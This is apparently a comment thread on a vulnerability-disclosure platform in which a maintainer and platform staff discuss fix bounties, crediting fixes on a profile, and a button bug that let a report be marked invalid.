Hey @oomb, since I couldn't find a security policy or contact email address on the repository, I've created an issue asking for a way to responsibly inform them of this vulnerability. Waiting to hear back, good job!

Thank you Alex! May I kindly ask whether there is a reason that you wished not to claim the fix bounty? Your feedback would be much appreciated, thanks 🙏

I still can't understand how this site works... Are these rewards supposed to support maintainers for fixes like this? Anyways, our projects are fully funded by our backing company so that reward is irrelevant to me.

Also I've just noticed that my profile says "0 fixes" - how come?

Oops! Is this a bug?

Hello Alex, we allow the maintainer to select themselves as the fixer if they patched the vulnerability themselves. When you confirm the fix, you need to just select yourself as the fixer. This will also reflect the fix on your profile.

With regards to the above, do you want this advisory to be marked as valid or invalid?

Thanks for clarifying that Jamie! The report is valid for sure. I was just playing around and managed to click the disabled "mark as invalid" button, which should not have had any effect but it did.

@Alex, apologies for the confusion. From a data perspective, it hasn't actually been reflected as invalid. I will remove the above statuses to prevent confusion when viewing the page.

I will also make sure the mark as invalid button is disabled once the status is set.

Yes, that's a good idea. Thanks again for the support!

No worries!